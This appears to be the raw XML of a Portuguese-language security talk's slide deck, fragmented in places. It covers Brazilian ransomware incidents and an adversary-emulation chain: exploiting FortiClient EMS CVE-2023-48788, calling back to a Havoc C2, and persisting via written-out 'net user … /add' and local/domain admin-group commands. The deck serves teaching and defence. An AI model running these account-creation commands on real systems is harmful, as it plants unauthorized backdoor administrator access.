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65" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="280" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="273" r:id="rId7"/>
    <p:sldId id="274" r:id="rId8"/>
    <p:sldId id="275" r:id="rId9"/>
    <p:sldId id="278" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="281" r:id="rId12"/>
    <p:sldId id="282" r:id="rId13"/>
    <p:sldId id="285" r:id="rId14"/>
    <p:sldId id="284" r:id="rId15"/>
    <p:sldId id="283" r:id="rId16"/>
    <p:sldId id="286" r:id="rId17"/>
    <p:sldId id="288" r:id="rId18"/>
    <p:sldId id="289" r:id="rId19"/>
    <p:sldId id="290" r:id="rId20"/>
    <p:sldId id="291" r:id="rId21"/>
    <p:sldId id="298" r:id="rId22"/>
    <p:sldId id="299" r:id="rId23"/>
    <p:sldId id="300" r:id="rId24"/>
    <p:sldId id="301" r:id="rId25"/>
    <p:sldId id="304" r:id="rId26"/>
    <p:sldId id="305" r:id="rId27"/>
    <p:sldId id="303" r:id="rId28"/>
    <p:sldId id="306" r:id="rId29"/>
    <p:sldId id="293" r:id="rId30"/>
    <p:sldId id="279" r:id="rId31"/>
    <p:sldId id="312" r:id="rId32"/>
    <p:sldId id="311" r:id="rId33"/>
    <p:sldId id="313" r:id="rId34"/>
    <p:sldId id="314" r:id="rId35"/>
    <p:sldId id="315" r:id="rId36"/>
    <p:sldId id="296" r:id="rId37"/>
    <p:sldId id="307" r:id="rId38"/>
    <p:sldId id="308" r:id="rId39"/>
    <p:sldId id="309" r:id="rId40"/>
    <p:sldId id="319" r:id="rId41"/>
    <p:sldId id="316" r:id="rId42"/>
    <p:sldId id="317" r:id="rId43"/>
    <p:sldId id="320" r:id="rId44"/>
    <p:sldId id="318" r:id="rId45"/>
    <p:sldId id="321" r:id="rId46"/>
    <p:sldId id="322" r:id="rId47"/>
    <p:sldId id="302" r:id="rId48"/>
    <p:sldId id="277" r:id="rId49"/>
    <p:sldId id="266" r:id="rId50"/>
    <p:sldId id="264" r:id="rId51"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
      <p:regular r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Biome Light" panose="020B0303030204020804" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId54"/>
      <p:italic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  <p:embeddedFont>
      <p:font typeface="Open Sans ExtraBold" panose="020B0906030804020204" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId60"/>
      <p:boldItalic r:id="rId61"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Play" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId62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4" roundtripDataSignature="AMtx7mgxuYjoTomKXWTaveVMrp/cjbLE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E532DDC2-6B25-601F-16AD-A0723C90C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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF2ED0FD-55FA-85AA-0CE8-06A10B84B5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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48829237-8601-2943-0003-18ADC08DF2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871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C6B441A5-DCAC-2039-58B1-CB7003A77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3D493AE1-EC2D-B972-1F1D-A19ADC7D15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965D7B82-E0D0-1F21-F079-65EE838C01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6188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106E59C9-854C-020E-8A02-4383BD2D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67D4E6DB-19AD-F071-5862-FF5982DBB4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EE254E9D-3AE2-1E85-177D-28F9872695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8238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A76B9E14-46D2-9DC0-A317-39B19248E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A1002EBC-0D08-FA6E-B567-4BD8D5C4E6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3A1408CE-7162-3068-89FF-881635CF55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2221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DA703435-C117-33DA-FF63-728F32757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C68C467A-161C-9157-2D6B-71DD2920BF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A6DF782F-7A8F-39D6-DE98-3573D7A002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38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6554A683-2D8E-909D-6652-34F1D61A1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C550E659-6B6B-9652-16F8-E2646272A0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035CF21F-CA5A-D98D-07FF-CCB8D0BD4B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8142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5D7319F5-1BA9-2143-E5F0-7A20ABE58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D0871711-1254-B599-8B11-10411DCD2F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EDDC7A3C-C456-63F5-2EBF-FC2B6AC384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0081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F6CB79BE-0499-99FD-8CC6-FC971F7C3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4EA3E13B-EF47-4E09-F11F-89CE0A9960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0998EB5F-5A72-8066-35D9-5F5D193781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3643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4BB90DF5-27A9-BF18-8365-C2BC2A12C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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE239028-7E78-6AE5-F4F9-220AD72EF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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA140C7-F209-A485-A5FB-DEB63C1629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8521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D18888C7-5045-9C6D-08C5-0606E238B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DB8EBD13-9D64-B790-749F-137F9395CB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0407A0AE-4A6C-A02B-B014-2E1BF88E68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0713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956BFA66-41E7-65EC-FD43-FBD7C9274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D5B25F52-2AF6-909F-7DEB-6529BF24DA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88D28E2C-4BE7-4136-C25F-F6CF2FF193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3914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A8F205CF-1053-F194-5384-7DC5FB684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191D2D37-E460-C405-1B05-1CF21165B1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D1D5A005-A142-D2B3-0796-2359B0E358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681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EBB08344-6CDE-23E0-6B93-9ACE7966F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01983F77-DD4C-B502-7F56-152DF7C2A8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FD9B6902-D593-B60A-E175-B4CB1DDE62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7756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63372DD0-7C1D-6FAE-4D88-88DA2A7C6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8CEB0791-4A56-C2E6-FD08-A9437F2441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9817AC79-0931-02DC-57F6-3D41CDB581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1198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B115FEFB-22FD-89BB-1CE0-654AE002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9CDE6A5C-0FEA-0857-33DC-E1E20191CD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1943456B-4129-B0C3-0BAC-ECBE246E4C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9806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85EDDF53-CCC1-D524-9D76-421FE0E5D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C33AD8C7-FD59-C9A0-9BB9-3AB517B0B5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4EDE11E7-C50E-F646-92AA-0956D28FB1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324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D866FD3D-72C8-4DCB-4FB7-F8366012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7BE5C5FD-423A-369B-B431-359A7F837A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1A06AC55-8372-B0E9-7DBF-CA8A3517A3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1937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E9B4F14C-446A-9F43-1B06-3075CB988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8E6FACFA-3BD4-30BF-6764-1930A1AC08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A100221A-CB96-60C3-7FE3-F541DEBCD1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1401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0BBFDEC7-411B-C1D3-2CCF-C8A30C175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F9A3F675-E7B0-3784-E7AB-991BD13B94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81E71158-4C19-E609-6966-D08DDE42A4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3728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D64B56CD-CDA9-406A-3E60-3C3132F95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E796C1C2-5076-AD3B-4A88-6B89D0BE88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64C15DA1-BE74-2565-A85B-A90AC30544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85323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B3AA506C-409A-1614-E87C-2A2E6E665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18DBA5E9-C633-1F5F-D1D0-62A15BE864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8F4D8737-5C10-47C5-D4E0-1D46881C96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8259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F010BCBC-EE49-6C06-1FBA-3FC40995D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3B95C493-6277-A410-52BA-7268A0687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F0487B87-1031-DA32-5CE8-086D54904E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33413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7AFF022B-DB74-D1DD-FDB9-8D7497064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82A67C51-1789-8D52-D040-BD18DBAFB3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9529422F-F90E-3E87-4C81-E18E96211D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51599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05691A23-5113-2E02-2016-F8A47C499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39135388-A622-DB04-5131-6DF2195B84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2A287705-2CAB-B8FB-9DFD-61BEEF7F37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36811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CFDE4398-A060-264C-371C-9285F8E84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E2E6A973-09E4-8C28-08DE-64643E8A17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98020B1D-8644-4D8D-B84B-D661F607DD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07137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32DBA3B7-78E6-6584-0129-CFB3DCD32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07D0AEA2-462B-D7A6-BB94-D941E167D6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B8B5E764-00F7-A669-6080-001D13BCD3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99610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6B93406E-B085-E44D-84AA-F40A21D62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F78FBE01-7E5B-E609-095F-302F600C27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F1D8EE8D-4154-BA9B-E032-FF3229D8A5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36956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B5B14EEB-FD87-9414-9F3E-2736DF384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740154A9-36E7-3A44-0EDD-DF3C49E45A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45435E63-8BB4-0485-7819-65617C466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48736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5F00C106-35FC-C3D4-2E7B-73D0D943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CF53F484-B2BF-A973-17C0-A2C4C9C716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4A18D6CB-0D79-D2DC-8AC1-3806B9AB01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0548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C1DBC4F4-DC14-B021-744E-B1BE8709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2FC4994D-8815-FA95-B1C0-E2F7D9296F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BFC62FCC-0887-A3C4-EF91-9EE534FB56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55123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71B7DAF7-2074-C13C-1742-D2682ABF8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415691E0-8944-F3D8-CD55-7822016497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5EAC2334-6634-F30D-7E9D-F1C44EC212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5679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F192D622-5FE9-9117-CFD2-D301641CA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3878CFD2-AA76-6D61-333C-50E67617F8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A5B803CE-82F2-C3CB-8258-03B896C75A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0369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51405A37-770E-2B5A-C7EF-9298336A7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037ED7D9-EA42-8B83-CE0C-2CBD1F7B45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61908135-3291-A09D-E3DD-E0864F3BF1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61462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5E6724AD-93AF-9D3C-2A1C-572CA2365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3C1A18AD-500E-3F2A-CEA8-A44CF42FE0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638320B4-CA7C-C39E-A56A-9ACE0E2A4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88150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0ED0C871-F69A-9958-5DD4-518074D84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7B3F5F26-FCE9-D5A5-EE05-A35FA0715A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264FF68C-7D81-F5F9-103D-7FB7F64F24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58087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5D24C50D-8210-61F1-3B4E-5CA09619B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5D5997D5-1595-8692-1322-500DC6A8FE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B1B4B203-8A94-26A8-8363-AADEE6FF3B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21109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C20959D2-9090-5AED-4BBA-B48E8E5E4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79FC74CB-8696-46C6-9B37-BA4FDFE397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0AD80C21-6EB4-1718-B7E6-076504E790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67932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4B584D19-DAF3-6366-AF90-4C9FBF535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F022BA0A-319B-E1A0-036F-9A6BC4C191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F8A65060-C0C8-0E2A-5061-777A46BBB2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08060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CCC48F02-381E-52E6-A829-980576DE1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257EAD38-C0A7-68E5-ED69-D7F5904DA4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8F358341-D583-9EF7-2636-B052F40EBE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98885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E7FE7C34-A098-2F4B-CE35-8F34955A9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95EEA54C-1E93-1569-922B-4CBAC5C160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68B56BEE-5D72-A510-6AC7-3A94DFC57F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95314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03A6F962-11FF-8E04-4C2A-99D7E95C1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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B313003D-22FC-F4BB-6B18-2772AE11D0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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCF5FF9-6684-BCCD-9DC5-CD39378FDE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89810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DBA9062D-1A69-5C63-26CA-19915228B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58F764B6-2CDF-10BE-74F0-C5BF5AECA3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8038EE49-788E-461D-CAED-83A5A4E383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820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75809D21-D7CD-A4EA-1BBE-33EB7FB2B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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD1B32D-7B93-A858-F625-AD3E6AE275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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB754BB0-96D8-9844-8346-C0347A913C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0082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3F25085E-9EB9-5443-E0F7-0B453DD00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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73DB4B4E-BD05-0EA0-96BB-7C6E8E1AF6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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DC03894-1698-9ACB-50D1-38C0F0921D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2639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4C43BCE5-38F1-4357-8DD0-708F4856E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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44FF4DEA-87B1-0807-4F78-255466005A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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B8CE18-FE22-36FB-1F4C-5F83619ECF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8264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E363A202-4586-39D5-30CB-9D5896FFA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36505A97-4A44-4ECA-3EBF-D6CE25AE21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9E63225C-2032-A82E-9D70-799CE94E64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1471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60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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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nnysecurity.com.br/blog/threat-intelligence-3/o-que-e-information-stealer-e-como-pode-impactar-a-minha-empresa-45" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyfirma.com/research/apt-quarterly-highlights-q1-2024/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ired.team/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hyperlink" Target="https://socradar.io/top-10-advanced-persistent-threat-apt-groups-2024/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide48.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheet.haax.fr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ish.com.br/blog/principais-ameacas-que-visam-o-brasil-grupo-red-apollo/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://assespro.org.br/grupos-de-ransomware-atacam-25-empresas-no-brasil/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sidechannel.blog/lolbins-como-ferramentas-nativas-sao-utilizadas-para-tornar-ameacas-mais-furtivas/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.thehacker.recipes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cannysecurity.com.br/blog/red-team-1/emulacao-de-adversario-prepare-sua-empresa-contra-ameacas-reais-4" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazi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mailto:lfpiasentin@gmail.com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53.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/in/lucas-fp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Imagem em preto e branc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7996" y="5021943"/>
            <a:ext cx="2955897" cy="1531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 descr="Imagem em preto e branc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386" y="275772"/>
            <a:ext cx="3039959" cy="1574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 descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorre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04629" y="1529298"/>
            <a:ext cx="6582741" cy="379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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorre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8512" y="1673141"/>
            <a:ext cx="9114974" cy="359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Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorre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48000" y="2656062"/>
            <a:ext cx="6096000" cy="154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Imagem gráfica de pessoa em pé&#10;&#10;O conteúdo gerado por IA pode estar incorreto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563494" y="1529298"/>
            <a:ext cx="3662266" cy="6116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>
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{530EC092-92D9-73ED-C178-0423B2B47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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5C91087-B8AB-1A08-E5AF-E02B412DAC06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2992850" y="762493"/>
            <a:ext cx="8861700" cy="5515429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5" descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7955168-F22D-60DB-96F9-28BC1521173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836" y="660309"/>
            <a:ext cx="4460723" cy="25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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44060152-938E-0C87-4150-C4A0DE3308C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3519" y="660309"/>
            <a:ext cx="5129358" cy="202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 descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85C1D159-A1FB-D56D-CD1A-7A41EFA9DB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2968" y="1194537"/>
            <a:ext cx="3430462" cy="86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E29CE95F-46CF-1129-F7A3-6D669606ADD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02968" y="2320534"/>
            <a:ext cx="3302636" cy="55154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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65CAB521-82BC-5531-9B9E-950F09D68F56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382876" y="888737"/>
            <a:ext cx="6451525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🏬 Segmento da empresa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none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: </a:t>
            </a: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Varejo de moda</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none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👥 </a:t>
            </a:r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Grupo por trás do ataque</a:t>
            </a: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Medusa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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💻</a:t>
            </a:r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que foi comprometido</a:t>
            </a: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Indisponibilidade temporária do site e do aplicativo da empresa, afetando as operações online.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grupo Medusa exigiu um resgate de </a:t>
            </a:r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US$ 300 mil</a:t>
            </a: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(aproximadamente R$ 1,7 milhão) para não divulgar os dados roubados da empresa. A empresa não confirmou publicamente o pagamento do resgate.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empresa adotou medidas de segurança e controle apropriadas para mitigar os impactos e restabelecer a normalidade operacional, incluindo o isolamento e a suspensão temporária do funcionamento parcial de seus sistemas para proteção de suas informações.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272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07218286-8DD6-E298-2BBD-CDDD54D1A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14E83709-C448-0081-6408-F67632CCDE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1325025"/>
            <a:ext cx="10627500" cy="5344488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16601334-70E7-70A7-80C2-9F80A34ABA5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253184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8EAF6077-0BEB-7604-8CA9-04E60AC1FF9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337896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640D3FA1-DF84-8E69-D20B-FA6F7A4DEE0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717758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B748AF2F-5022-DDB8-A487-2081CC89753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8643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F8007B14-B3AC-3A0A-A422-9E62815C305E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765190" y="1325025"/>
            <a:ext cx="777831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Recon</a:t>
            </a:r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: Varredura de serviços expostos (T1595)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711EE5-9823-D2E3-05E2-651775D1D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8334" y="2471700"/>
            <a:ext cx="8309883" cy="4048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Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E66F83A8-CACD-BFD4-5E11-A572CBC17220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255793" y="1947841"/>
            <a:ext cx="828129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pt-BR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Encontrar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FortiClient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EMS versão 7.0.x: Das versões 7.0.1 a 7.0.10 (</a:t>
            </a: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CVE-2023-48788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pt-BR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.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048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BFC4115B-A6BC-3576-1690-BC54D9091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6B08218E-7F06-AC61-8030-0130A7E0DB31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="685800"/>
            <a:ext cx="10627500" cy="5983713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0BC24980-9444-F0DF-3F42-68F69586720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42872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5FCE1E45-B8D9-CBC2-202D-E5C6EA6A59D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127584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6CE3D919-5D31-F6E0-0969-B9534314B28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507446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6C8AEF5D-0878-E8A1-25A7-A5954C629B2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8643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5C40BD65-070A-7EC2-8661-5E45A9860231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3843856" y="686097"/>
            <a:ext cx="777831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Acesso Inicial: Exploração de vulnerabilidades conhecidas (T1190)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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52234825-9E4E-365D-51B7-27B0A1FD9A02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267660" y="1594455"/>
            <a:ext cx="8937044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Execução remota de código a partir de uma interface de gerenciamento vulnerável, criando um ponto de entrada sem necessidade de credenciais válidas (</a:t>
            </a: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CVE-2023-48788 - SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Injection</a:t>
            </a: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no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Fortinet</a:t>
            </a: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FortiClient</a:t>
            </a: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EMS)</a:t>
            </a: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Exploit</a:t>
            </a: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: https://github.com/horizon3ai/CVE-2023-48788 | https://x.com/Horizon3Attack/status/1767965754744312161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16549C1-50E2-BC73-0B43-A2F967F4DA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7660" y="3325950"/>
            <a:ext cx="6204395" cy="3224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04D24F9-4265-A677-9EBD-B2F75251EB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3015" y="4407408"/>
            <a:ext cx="1955628" cy="7631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65901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31EA1748-C5FF-6187-5830-A5CD93946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CA19419B-CEA3-1AB7-DF47-4CDCBB7D9899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1152144"/>
            <a:ext cx="10627500" cy="5517369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D1A02D8A-4F5D-AE7F-7AA4-E518A626E73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253184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55C69990-E2D3-7912-4ABB-5111D61A8F2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337896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773C2F6F-005F-DA9C-4DF1-1BB3C347D96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717758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C19C9A1F-C2A2-A5CD-B132-811F1D64599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8643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94643220-D065-044F-488A-02B189CD179E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3713977" y="1194691"/>
            <a:ext cx="777831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Execução: Execução de código malicioso (T1059)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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B283864E-C609-AC5B-7988-51166AA058EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267660" y="1904420"/>
            <a:ext cx="82421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Fazer com que a máquina alvo se conecte no C2 do atacante.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Exemplo de C2</a:t>
            </a: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https://github.com/HavocFramework/Havoc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5D611D1-F778-76D8-6B1B-F20A023B06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9530" y="2783365"/>
            <a:ext cx="8349113" cy="3307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23144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DC54D9C4-7883-FB9B-4C87-F7F4CD35A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E4639F02-01D1-1F0A-BA5D-97330CB87966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1152145"/>
            <a:ext cx="10627500" cy="5184648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B93C5DA6-76AD-5787-1B7C-A759F2B51A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575" y="253184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15CCA2EC-532D-A6BF-43C8-D13281C180F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47" y="337896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43AEBE47-2B16-4892-553C-89C82535484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1920" y="717758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DC517D87-1966-F694-7E92-0423298D75F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42045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C94E37D0-DB7C-4E0B-A21E-A8A11A396EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3503439" y="1210130"/>
            <a:ext cx="777831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Persistência: Criação de contas de usuário (T1136)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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{201E1F36-B4FB-ED59-2228-84C6903833ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267659" y="1904420"/>
            <a:ext cx="857438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r>
              <a:rPr lang="pt-BR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Manter acesso ao sistema mesmo se for reiniciado, se o usuário trocar a senha ...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03BF67DB-A4F3-4567-E507-AFA38EA246BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267659" y="3011844"/>
            <a:ext cx="8574385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Admin local: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net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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8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hackingnawebday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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Ownado@2025 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="18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net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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Administradores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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hackingnawebday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="18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endParaRPr lang="pt-BR"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pt-BR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 acesso ao domínio (se o usuário da máquina invadida for Domain Admin ou equivalente):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net user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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hackingnawebday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Ownado@2025 /add /domain</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="18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32745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D1DAFE5D-94D0-6334-FB6A-54F4CF3BD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52DFF697-F346-2C84-F15E-B2E4FE26609F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="886968"/>
